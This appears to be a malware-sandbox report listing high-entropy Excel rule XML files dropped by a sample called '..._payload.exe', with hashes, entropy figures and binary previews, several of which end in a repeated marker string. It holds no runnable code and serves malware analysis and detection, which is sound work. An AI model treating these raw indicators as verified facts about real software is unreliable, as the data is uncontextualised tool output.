                                                                                                      Preview:<?xml.m..5..uM..(.....r...D..y.....*".'y|..V_........fT;.u+.]....ps/.5.OH3..r..-QJ......?H.?.&...g..`r.n.{....E.(..~-.;.x.H)..|.....3.D.=...4.........*X.=.I...I'75.......,A\'C.|..kZ.SK*`..M....$.. ...1."..o...7...)r.....L.+(2'y....8...K....e....g.p./H.z....\..#.5I.".=..3...f%..!...'.&....Q.....FkK...4.....z......\q.^O../..1.A.N..7D.YH:...+3...J...NA..I..."k..@(....Ra....[.#.m.._.t.Cb.....e_l....6,V,....+ykY.`g.=.*. .p(~A.5.A..1d..~7../fM.[.h..V...?..{...gnRz...b/.MJ...2.H.P....o:YY.P.q.....<..!@..I|..H_..(.JY.A.D.....2.g.!.9y..9.j).QF.:.vWRK.=[Tk.:.ff..-lI...5.x..............pGxi.;..t...1H...@>..?.T..@..]..V....vt..;..X......X.......R......k..4.a.)....tX.RsY.F.H.5 ..e.A.)p4.ZV.0_*vK.v.....5".l....`5.}t....iXs..uJ.D=z[....(...x..i......Zo.".....G..=O;.T.}F..p.....=.8..Vu.i.`.........+..n5..g.<....XU.C.*:u..XyV..|..{.U...In..Q.&.$.fV.....0&.....S=9._...ry..)T....../..9.w.),...;@.....9r~'....i...6.....'..d..nN.f.L...4.j../.>....P............

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11933v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3677
                                                                                                      Entropy (8bit):7.950685455052748
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:iZbee3gskK5SmiNG9SlcestUy8z0FdgIyBHR7rTLc4qVAi:iVeHx6S2mz0IIyT7rTLiVz
                                                                                                      MD5:C0FE1CBB80E52311DE57389D218ABF1A
                                                                                                      SHA1:F92915A9A88D4D545C79C8A1D68CFD50BA511C6B
                                                                                                      SHA-256:854917751D1BE1DF15C4CDAB5E08F90B11D4A64CA096D354B7E6E2A180E0D4E6
                                                                                                      SHA-512:9E4611658433A052D36B656DB0A38179C5025D1B51CB1A73A323440FD05117AD97B83CA4AF478EADFAEDFECDEB33146D967E991BAEFE03633CB4D0C12E05A721
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....[....:.8^%....|.?Aa.....&R.u/q..c4...jE..b.,....m...X..U....Y..(...f....h...Y..6<...\.at.t..f.....]}...<.0../...Z/.../vye.Nh./.O...4...G#W...I..2.p..v..&p_}..H.(.p....:...J.E.=PVb:#...c.....8.Z.a$...CZ..A.JH...j.NL}T@"..U.....}..\CT..eA"ras.>L.P.!e...}qN~.i/!.An....r.2.`Z.p...Y'{.i....|.h.5(}.Gs.........75t.]d.!..=.....ydA.t'~?..S. .!..>..$D..l..U.v..~...g..z....qv.{9..w..bk..........WX.~._b.Z.......}K.r.j.K. \..f...1...I..8....`..b....#5#.nP..;P.~.b...U....;.m..][9.+Z.ZD.Rf.)...i.0.Z2`.h.!...h.....i...A8z.....j.|%q...`.\..z.p.g.y...N.Z.)-..W)y.F2m,...UR........>..>.e..=..v........M.W..v....u.{.3g.%.G..sv3..0....L..1......i.".1.%K.z....X...[.m.$-...Z.JJ3.C1Yu..%{......;.c..f.~sQy.V7.........b..I..K...<C...M.TT.3.].F.!...~*2Ry\w.J..R.n(vQ..,=&...N'.....Z.Y.0T|..i.h.]yI.........2..5.....ijj....|*~.v.P.._..(k.+....b..k. .8e...+...K~9+.....0..W...1...FW/...9.........u..f0gs"k...3.U.....xi>...0.,.:Yc.W.c.Sc.R.M}....g...e..@.N..p.W.s..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11939v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):744
                                                                                                      Entropy (8bit):7.704175857110383
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:e6B6ynpZYR71IHmEVgxY/XBFi1bk+6MMia/4Q1LDs6FjXSUElOQe+vMnGLinQ1vk:ea6CpZsiGNeJFiDQDs6FjgXeZYiMv6bD
                                                                                                      MD5:F7ACD41C331161B56F7B60EE367E19C1
                                                                                                      SHA1:94E0047A0535F9D24AFAE94F9C4EE381FCF70FC8
                                                                                                      SHA-256:D642264E600DA50029A55FA260B66628ED92874295E62B8FA2DC15FEB433C78C
                                                                                                      SHA-512:94598592DB8ECE5F9E23B4C84BF858E79458B85D7EA6712CCAB7D476847147961D7121E2A6C4B42B4DAC11278FAD2EC6D0D2E8D9EC404E53B5346D7425C458D2
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.4.1).!.&..N.l....mpi.x%|..11..1TW..Q2Q...J....B.R......NV.{0v8Q...j..:._.h..3op.b3....Q..H...S|.|`&y.Y.;@...mo.;..=..._..uh9...-.w...y..e@!X......"%.)|W<r...ab../F.N....7N....'(..Y..ZF|ZG..,.:.\.JQ...BK...E..j....8>VS.4w......'.....XE.4|.n....'....Q..&(na..Iha#.S9..H..99y...b..^..C.;.Y.6....X/1..g-.A-`,...{?.....)M(._O..._.?.PS.....6.&..`..w.l.y....{.......$.K.VF.irY)....}&>..A....NZ........f.Wg.A.j..2Y...%q..,...>..`7..._.......t.....T..........d.@....o.%L(.H.E...Qz...s......Y.Q>...Y...w....'..|#_.[^.. .........J.w,o...f.tb3..MU|..W..63..V...y..vy...G....5...L.&.%K.....@>.N.?.x..}..c..O..{..P.iu......X....=...nU..Q...Q..U...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11950v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1620
                                                                                                      Entropy (8bit):7.852773359086492
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:4g+nsvUZPvLR60BScoDJoM/jqoire0OPnUDifVKj6XvtBqRrRPZCuDmVzQWv6bD:0nxF/cSM2deBU+VK0qRrNZPCzLwD
                                                                                                      MD5:C19ED66993E003562E62A2DF94E6BA12
                                                                                                      SHA1:12B650748EDAACEF2F07DC6C8D467B8DFABBB443
                                                                                                      SHA-256:6D2715B1274191D9AA4B18D17890C98472C847D9A5DA812609FBE474DBD5CC12
                                                                                                      SHA-512:53CE5CCDE602B5FB0F5E0F603E393385D4002094FE965139DEF4EFC764758C0D87008EC6F9783ADE83169C3C711C8C47F1FF5619084CC94A5B06C22961725C0B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.H......I-.......X1.*.g2.}.D....*................L...Y..7;..>D..p...0*..m...5.\G...j.B.'.I.....b.\.Lo6/..d.8.1..~.."A..........6.r(s.|........c8.:..IY y./.....4..eZ.h8..Nn_.2..Q.Xu#.DL.K...%^.....@......L?w..g......w..E.....9.....]5..+.._*9P.X..4.g..|...{-.^`.lca....Z_ E.[~...^<..C....V,..+..%..~..v...^\...<c~qM.'N.....5.A..|b2..z....F.......*T...0E.f..dQ.v.6.k.zx........z......8..c-{...Kh.j......P.0Wh..k....!.U.0.N.pdGd[(.`.-.n9n..~T.....(..X.c.=a............qO...F.F..S..9.......Y.%j.=....*z...U....C...m.....&........%...Y.o.....v..1w..zd.q.(.!#....)Q.~..U.....YQ*3.............(x.(..W..1..9..I.H..D.}..E..........s.h..eu..#.b%.a.8.9.....k;.}.E>...w..9.D."..x......w.....Y.,.....a...`..,.X.Q..........@B....[b.$.a.X..':..g..a2..y...N.....{.u`.N.....1#.L..zTY9."=.d...~.W..cd.{%..+$...2J..J.=...P...qx...I4....8,.x?g.Z&..D.CJR3.v4....k.=...0..D./VN....6%EC_....?.eN......7)&..so...V.q..xZ...#..Y..f...dp...".I.w.3...nB.og..1..dq...(@

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11981v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):821
                                                                                                      Entropy (8bit):7.728348633119522
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:+XrZfY/jZm5fAfjoc8j3UIwvo/qDou8gD65ncCML6HoGuwwMAYI+ABFMX/7v6ciD:+L51rdwyqDXDzCZHo528+ATMDv6bD
                                                                                                      MD5:71E974C9C6FA274BC273C6A877C48F55
                                                                                                      SHA1:2B4EC82528D372B054F7D9DBEC549F4778E3D85C
                                                                                                      SHA-256:40A08CC67DD603913389484D2C7C430FAFB40B382F0A96B088A7CB278B5810C3
                                                                                                      SHA-512:8682B1EA1F45E3E2AFF1F545B23C0B39258D78A7B2AEF52CA40ACF10DFC431621F2E7925FC393704626C181B56D52369FAA4BB3939DDB22F2F8402BDCED6C8D9
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...".9H!4.f.O.+.r..M..#......#.z..C..+.(<.5\..]..[x...U._3..?.s..........u.r$T....M.k..3$b.J.gV...c..v~O.wl.?W.`.C-r.D....1..m._.]..'.M.e...?;.w.9.......Ek.fC.!...7-.....hq .fz..y.../&(...N.g|E&.o..T..`...k]....8...{..K+L.a..^&.....c........83......1..hR.c..#n.hF.K~.-._.u..<....p}e.....s...c.G.q.$...]....4..~N..n2.w....c...^It.0I...'...K..uG%Rw4lA..!.xT.ni...sUL....=H........lF.......R.:Eq....\...m...5.IC.u...F....p.f..lK...%...AW0^%&P...}8m..g..R.R..0F.s..k.`....h.mD7.....}..V$O...._G..%b|..H.U.e.t.g....2h.\.3...5.b...Q.`..A.......,.bsA..>..X.....a.]..@.;[...;R...bH..i..FIT)..J$<-......T2..|.--O{........?.a.Tn.UiV.......z.`.|"ZF.....Q...@....8;.|...R.....$./...kXu=N.VZ.{dF.c...>....Z).hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11989v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1034
                                                                                                      Entropy (8bit):7.789048809880481
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:AX6ysb25bcesFCXUya5D/zstuVOnR4zZdv6bD:AXNsb25bch4+d7YuVXzZdwD
                                                                                                      MD5:E4CDAFEE7729411E49DEB3E4279E6056
                                                                                                      SHA1:2926C29F5B0298027CDA7177B2C9EE5055121828
                                                                                                      SHA-256:D11FF41B71CFD6E436A2AC35F1154FF17681BF18A1491383AE3B35D1F770C571
                                                                                                      SHA-512:E735A5A2DE17B782301B1413A1D885E2C596970411B3ACFC40FEC16F6F23FE24E5FD01E2BFBB5F756A0B4A15761B2AA1DBD8311475EE8099531F44223A105256
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..3.....P.,......3.`...w.....O<..u..Y&.H..9....L.....<..3.K.....'Q.P.r...>P.j..SN-!...0......<]..F.6... mSb..^..9vU..C.xX...".&M^..6SJZ.........[....n.Q...OZ...O....se....N..`..9.v/.{l.....Y}..+2...~.4....n.....:...G......Nr.n.....(.T._.....O._X.1..u.*.NJ...b....'....~..\(j.)2...FJ&.../.....s1t.....t...g.j.C.t.H.........H..Ya.C{..uv.D*.....r....+/..`.R.?qom.....x.4..ne...D...Z.69.~.1.A2....1..U..C..o...1h..s.P.r......S....9R..t...hN......Z.P.......X...ot.@..3.B?.....JU...f...8T..K...pf0..^c|a..z.t.}Ax.:ua:.^...u..T..>....6..>..*\...ZV.e?.p.;.8...5u[.;.(.....m.`o@.....@.'. ...E..DU....@..}.x[.../|..2....7...v.=.p..E..............0..9#......4u.R.....J.{|.^e...N.Dd...a.rVW.*Yc.r..*.&....x.ri...x..Ky......).P...m.Y..BNh.ul..O...F.*7...a....;.F5~!.....A2E...Q...Y..9..N....0..@..cGxc?.Z..?...8....p.0..W.......J...v..`......R...vQ.=....W....G.}.K.?...>m.]p...1+Wj.......8.8..3...71.#.)Vyq\psn..B{.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120100v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1333
                                                                                                      Entropy (8bit):7.8509741967056765
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:RvMd1Cm4Nw1HzIKPHotgBJmSfW+NmMbWnjvkaZ75CYITnt273J9qhrG1fK57v6bD:RPNwrPHqzZLZ75CYITlKCwD
                                                                                                      MD5:1B4BF0B8D17051A2A52EF9F923A64CEF
                                                                                                      SHA1:27772ADF5C13A2F9CAA996CEDEEBC15E6664FE87
                                                                                                      SHA-256:DA9F3117FDAF62B978192C7439C8CA51B71E380F35DA73FB84318CB783548086
                                                                                                      SHA-512:9BE4B43305F841239CCBC1855FF1D13A208CAF931B4DB0EB651714BD03AE78994E3A72F958859E28F0202C2DBF5DFC492BADC118A9CBE0AE2C57165A2A314C84
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml4..m&0........(a.x......J.Df.Su/._V"..5S..b......IC......_....B)L7.....].L.+..o/!r..;./...2.1.[.]...j.;...x.@.$:....E............f.>.e./tg...L......2i.LS(Q.`c..../9/.oGO.>;..d|..(........v....~'..*.t.........t.$..T..!....@.....AA...%....u.l..I.L4..i....E%...$....J.)zNu.W..U.... .....R..Q.k"...o....qvF..vs.b.m.#.G.H...`.B4}....B.u7.0X..z\hlT.....&......qHl...A.C.....&.W.@.X...<.h.....Tz=.0.b.....3D9S..........O7.lq...(..l..V{....*./..rz..Mz...o.J....1..b..Drp..z..W.|..y.\....N.q...%.lf..[G...l..X..{..w1.O]./.#.....q.&......5.B.P.......u.Vj.NA.........>....X..9..i^i...53......Mx...$.K9.8I..G.....P./.78O.q9..}{.E.5t..+.7..Z........0.....b..)l^.P..}.c.?..q..e+6.6.............m.z....`..^.@.y....5b!.`W.....!..om.Ro.bJ).&..{.4.....n......0....5..[......-BZ.Yj.T.'..k.Q.<."......W.Hed..cI. .At...ZB...J._(..z.C...r...u.u...Q}.Q..^....\!?.....E-:..d.E.r.J....B..d..........(.$d9L.......A.........r.4Q.5g.".m.!.A.d...HM.F...>i.@#./..N..%..,.`Q

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120107v6.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2514
                                                                                                      Entropy (8bit):7.925800765313116
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:xUoxIUtDJkomJkbXTuIJdlnkgfzs6QxIqUV/qwD:NpHko7bXiIJznfzsW1n
                                                                                                      MD5:DB10AB5E8589406187E73EB7B421A542
                                                                                                      SHA1:33679C4C9EB748D89C5DAFB27CA75F1DE7E7201A
                                                                                                      SHA-256:22224CCD6D1D526C4D7F3DFB20D736473E07C9690D137CCAB4F553ADA561C007
                                                                                                      SHA-512:3EFEAB7C3F9387AE6C3C73F2E5F38B8F79CB5C48CB31CC34734758285AD9BFAFE97698A5B376DCB2335CD790986DF3C271C45BFF283E7847C179F435D5818225
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...^{m.u..?....o...........#..I...T..I.V.9F(..N.<*...&......7~_.....MV..[._..R.0!.*S/...7../...3[...8a..*..'J..7U.c.O...i...y.m...=..d.....Y....:i..i. G..l.a.-.[a..,.(.'.]....'.|x.....;..p.$...=,.&..........Z.v..!.%D..jq11.k-Cu.-..._..K..F......<..K.1....Q.c..a...D.6.......'.....x.xz/k....@X..}.@.4..ptS.X=8.....(=ZV.u).."..l1h.M.P.Vh.A.%.........c.................4..Q.K.........A..|8.n.p._.W.....f.............C.ig..V,$.nk.]n..{.Be.._.Q0..^.'H...r..5W.).P.$.-=}..!..n+.6.^o.:hk.n6.,.O.lY;......\.Y................i)-S&.....W}X$9...S.....S%P4.#..C.E...n....$)*;...7H.o(.......W..3m..r.....e.|.g..s....0ZQj..dn.A..=x...N...c.`.L...td..g".$..?..m......2?a....(.<sm....../<w..~.`2h.{....v........f.Dz1#.j.z-. .....pr...v.i.6.<..~....2....4....y..u(.....1(.P,.. 0....<..4..U...........f}..A....C..kS. ........5y|k|1.{7|.....w....p.......+.d&..T..\>. ..>..>..z.6F....)......<..r'.....N.1$.... .T..4.o..k.....E.@%8.{..R.u.\.X

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120110v4.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1346
                                                                                                      Entropy (8bit):7.83584271108757
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:dGtZGD/21sxrhGGU2eiUS2/plg6V2OhcPZfi5o8CNxR9WV/11ZtP61E3GIChv6bD:dGtZo/MsxrhO2ef2OJ5zVnPcETIwD
                                                                                                      MD5:9D5A3836E45D82853E13DE6FF6744EA8
                                                                                                      SHA1:00E4377DAB331741F8F20945850013EF5C1D15D7
                                                                                                      SHA-256:42D4CD5D71340AB1B1F13139A509A7EFE5852E53EAC192982EE16E415942D7CA
                                                                                                      SHA-512:6ED86985DC89DE5C2C316A7F29BB0BC8431FD9B8FC6B116D3539E12DF9528C07F2E12DD0E536929D229D94497029EC69BF176A36A5D8E7EEF1A16B4A853DA724
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.....$.,.S....%R... .6..*.Y.)...<.....vs......|.G}...;...S.G...%~0..f....J.}0....)t.a..C.r..4....._x.r.......^.........h....C.....H...o..wj.G7.xT..H.w!./.TX.r.j8.....%?..S".=.. .........".B...V.........).?.<......M...5|5{..Y|.._...?.0.) !.R.H..D...7.......1...oz.<.Q...%.K....35...cs..W..;.1.WJ?.L2;....Y.X.E.FT....\.b..u..G.2.49..0.:......."....A...7+M.3I2v..f.+[>....../5.)..~...*...v..&..Sd.I...Z..j........ .&.}Z5.I1.;....I.!m.o.....?....6.@..x..x#<FW.d..yt..r./h|S..".."..{D..jb.....r.G&R.+W..8.-?.w...@.p.... ww-.t.bXH.<G+\.h(!..+....W>.D.......>[.d.4"...W..!.9.V{.GjT.F.l..J.dr.cO..Uw._..K......y.G.....t.KOf...G"bd?..eN.k..l....t.Ob.1\+.h\3.. ..he.]`.fx...Y....'..A0..{.......Y|..2....u....u......d......0Lj..s|.a...}.......4l0.}BG.K..{.E..e.p.M.....JUQB.....<..p..Z#Z.......2P....+6...v.:...|..u....|:....v.@...fWp.b........w...>..._.&..P.5.b.SRQ(.......;mF...5.g4.....w...B.4QX.6..AQ.[B/BF.b...-.....|....R...c.y..]hY.@.*o..8.Be

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120112v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1041
                                                                                                      Entropy (8bit):7.766922497295222
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:UZBgpxMYX20+KHOlQsM7fkts/T3R858zoNPtzpMLlK301v6bD:UZKxMYG0d2QX7fx/TfUdFuLdwD
                                                                                                      MD5:E59B39DAEAC6735FCE01110C09720F9F
                                                                                                      SHA1:B46E27DA5928DA39230CD7E89ED75BDCF5B986EE
                                                                                                      SHA-256:2004382AB891B08E8E68709A954CBA3D163103CC37A495AB7B47680D3B57DADA
                                                                                                      SHA-512:A7B58D36884D7AB27347EB87567F1A85D8D8B03C47762A96FC7D1944A748C45721FD25E73000408D7FC3FBE790DA9DC4DE3E250080282A5A0D79E440ECD16FB7
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.%.S..!.(.....).......~..k...l...e...d.fz...?.M}...'.i.X.J.PA.0..a.g..&..p.I`;....<...d.....l.x.@...4"....YD."b`..J..*g...0d.C^.(.[.z....|x8xEv.'...!.....F.V#^.....z.."T..J.............?...T.c.)C..@...Mr.Ry.....h.8.U..R?...N.h<...1...h..S.....0...0i..]t....V..7..XBO.....R.wP.!..@"+B.W...1[%..&.....O..K.\...E.z.Xa.27nq....%........"..>Nn..E4D....oF`.0..M=....*.7..|........3..[.s.".K....C..#.+.<....J......U..>.A....l&m'..z.n.....X...$P.Kn...-.(Y.......!..:>...q.5.u.....:....2..S\.B..a:.H6.0..:.8.....v(.o~...E>).L.Wq.....x.^n`.PB..w.V......N....^Nl.........A....7.......<.4V.U.......guXE".J.U.....E.....\U......C....3:G.%....9.....?y..?\...\....;.6.o....8.b.A.^-....,.{..'.v@......;f.zcc.P|..*2.V..3.....I...9C.S.[.(.E.....6...v..rB#C.d..TFO..-.-.;..Y.Xq........u=6..{"u2.W.!!..3...|..th].....E.....B...H.>.G-...?2.Q.=.o.5...^....n.. ..KC=H3.q..F.......W..x.n.Gnp.AQ...d.<.h\..z..2.&...`..o.#.M}S.T....!...r?..ahZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccd

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120119v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1664
                                                                                                      Entropy (8bit):7.861658753629735
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:bw3dKNaP01Gi/iQN0QRmErBhMOGhG24yubenwD:bwtKZV/iQN0QRprBhMlPubZ
                                                                                                      MD5:EFCA30BC579083B5E2410DFBEC3AC46D
                                                                                                      SHA1:E40BFD3492ED5527273F45B5EF03B3602C416A83
                                                                                                      SHA-256:E6D56C6FB20D7E239D66100D9C2C2018F82C8E8662539294AA163465FBE00DD4
                                                                                                      SHA-512:4ADA4D3499CAE5BA0FF38C2C72811C512BB869278F952A01F464A8674AAE716CACE4C840777EFB14B3A349945EEFBF0C2FEA952AE71CCB06C7F41E4E955D8B0A
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml7.t...u.Of.;....._:l......Kqj.....+v~.6....Ba..#.!.Vd..@V.......s..r.z........}*...X-.l...2.. Cb..U:1...UK..h....S..I'.a..d....c..Pv......VG.AZ.%.k..#..!..0..7q..`5.c+.'PA.E.o......y3.6....qf<..,.RG.=...z.......pW.m.K.W"......C"...D...}6...SJz......V.@v.2..$u" ;.JH@.T....@..U..9JAcB..W_..|j.;..i.....>^1P......2..$.p..c......._1bs`xT"...Mp.R......^h.X.\Z..Q..A...u....l...M.h..n.7A....C...OJ.e.Y].....r?..4.g"P.=KS9.o....8Z_v....Lu....gA5.h..[.....q..J*...`.7d...#.....J.Bw.".tt.#...0.41..i....8j.p3..!].m7.)...!.................%.#..T.z...\.7..d./..Z.x......X..eY....2y#..`xZ..3t.;.(.,.6E.......[. v....4?T.z?<...#K/..vL. .k..Y....8nA.{L..|...oR>....Q.[.t.l...RZ2.@i.,.Z......N...v...P....-..66#E3.....2[.8.3..y...-.%K.J...w..aO.F..ev..6...O. f.......s.....j8.E......f.F.r..gy.O.Fy..3.L..(P..#B...m..^]b..97d.8....rH.s...ucBR.t..~Z...xa...[^...8.fJejr........2....\........1..L..?.B...?z...A.......*.c....@1[..1.Pwl....., ....1.q........K.].!*.....}.".~(.7....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120120v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1195
                                                                                                      Entropy (8bit):7.838468959054278
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:4m5U5n6F9AQO7A6ekPQTysyvpzBVs98FuErlTVnulMOVEEv6bD:zU5n6nAJ2zGSBEr5VnUXEEwD
                                                                                                      MD5:23DE887308388B5D9B572B04D39CB0D6
                                                                                                      SHA1:695B676FB0700C2EC6F2AAF016CA528CA3C91AA0
                                                                                                      SHA-256:F114B6EF49C2E5C89268FBCF9EDB90072A90AD31F5B09A24C22BA90B29583444
                                                                                                      SHA-512:E6223E9FFDF1AA466888F35F6E14EBB1EB277F3E1548831D565D5FCA90C081F04099C423661B3BF0DB468BC74BA059C94122BF75A540269B06780724EC4D0571
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.$.C........]....X..9....X.....h.'e...A....x..R..d2.."d.........L~Yd.L.=.%../n......i..........h(K+&....J.o...\G..=p...?.b..\.B,a.B.~&..,o...O.......,.v.t.^3........j.....X...[....Q)z...:@..%J.....Z*.v.<.n.#.N..#W.8.........N&.Kl/.........l._>..jl.0.......k..SL.)?..D...njui.-e..;.B.+/..56.....8.....K.h.Z.....~N9....'...n...h.`=.x.'....Y.m.(. .X.8..\f...E..VL....w.RC".U..1l.G....U.^Ra.........!3.D.>.......|..C0..;..T...d.E..n.U,.=.....q.....z.........{.X....g....'.a...Ri..)...Y....-..6D..7{..0>..n4u.dl7.n9..6l.....F.h|.=\........i.!."..}...f;.H.`..Z.Kd.p..m..[p....."eR........./j..V..=.kT.......>..H..kV......0.L.M7.+;...5R\...T.......6........'&..L.$.>....?..a...B[y7..c.f~L..,C......N...FlL.9.P..s.$g.....S..1...V.~.uW........r....K..R..}."%...UF.:2..(.Gn$.....q.i...yd..}....2...}5..>+...-.8....C....$0./..u...p....zi.q..h.o..V..(.cBh...k..l....B.......K.%.D.%f..O..K...G...>.c.@kF. g...w.'e.e.......1.;....{.Sa(.st..+n...x..N..WC....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120125v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1269
                                                                                                      Entropy (8bit):7.861445252323393
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:14BGHFpHiWMvB1tLHdNeJBsWboJ1VzYGqNSCe/bb0oLLv6bD:RlTMRLLEytVzmkCe/PLwD
                                                                                                      MD5:FBAC44C2E044D3A2DB5F7FB2DE27FF16
                                                                                                      SHA1:55D8A5DC76C20145EEB1B7E995498E0BD4A9D19A
                                                                                                      SHA-256:8B7B00D5457FCC3F3D8DA6C9F3C7BD25EC764DCCCEDC3B098B96C6DE451965D6
                                                                                                      SHA-512:D7B75C88A2709AF2ADC84B424A76912D38BCEEFD253ED38F982BD57CA7AEBD1BDB0EFE1DBFDB61538A27633B2FB7B9E95F5F9EB8D593C5E1D67BC97D6EABD276
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...IOC...s.;....P......N...).......2:n...0..'...q!..9^....Ju&...|.-s.;:....\L.).l!.......u$..$g.i.U\.R.wz.6 ...........d.W.g...P'.J.=...;PI...0...T..a]...|.6F.."..j.\[..$...{9W.....jJ........QW8...,%.K~.}...(.#'..q..O..z6&.k..w.c.....l.[..*....|.Kw..#@.....;..X.(hb....B...s..t......A.v.........,MN....]....I...........L..$.].....(.&....m3....c.fr..%./xm...;WC....R.D..V9d......e..+7.kF18..5F.X......#..}...q..G@..;.....'.o.M...+W.k.y..f|ky..iK.o{./..... ..5i>.e..}c.....&...2.7.A.@.}.?..J.n..j....{......-~.uT.Jm..oF...ahXe...T|-.k....'7w...$..S..(..:I.i...z.E....Y....z....A......d......".1....G.>L.*.h...u...y....rI'.khH.u[$t0Q...f.j...>...N}..*...G...s...o)...O..j.7...1..E.A....K...E.O..w.Q.$C*$.J..%..c..oF.RM..I.U}{p..2../........=..L.9..PE.w"%.^.3...fj>`.N.B}.=Ci...".eaj%.*:.6.....9h\xAP&`.....(..T1pP.mo%.cq[.".....-..U.XZ.d>!.,?.T.u.3......@..)..... .V...#.!..!...t.|p..w.s..h.S....,K7`....N.Gp...u..D..,......av.....@..f.).t....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120126v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1994
